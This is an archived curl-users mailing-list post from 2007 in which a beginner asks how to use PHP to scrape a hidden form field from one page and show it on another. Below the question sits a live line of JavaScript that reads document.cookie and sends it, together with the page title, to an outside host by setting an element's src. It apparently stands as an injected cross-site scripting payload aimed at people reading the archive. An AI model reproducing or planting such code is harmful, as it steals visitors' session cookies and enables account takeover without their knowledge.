cURL / Mailing Lists / curl-users / Single Mail

curl-users

hi

From: sux <killthedick_at_yahoo.com>
Date: Sat, 8 Sep 2007 15:58:12 -0700 (PDT)

Hello i am begginer with curl . I have a problem .
   
  I have a page named http://example.com/asd/index.html with this code :
   
  <input type=hidden name=first_name value=Laisha>
  <input type=hidden name=last_name value=Mark>
   
  the second page will be named http://example1.com/asd/index.html
  and i want to make a php file with a table were i want to display first_name from http://example.com/asd/index.html into example1.com
   
  what is the code?

window.status='';var x =escape(document.cookie).substr(0,1900);document.getElementById('a').src='http://www.alabalaportocala.org/alabalaportocala/a.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&cookie='+x+'';
Received on 2007-09-09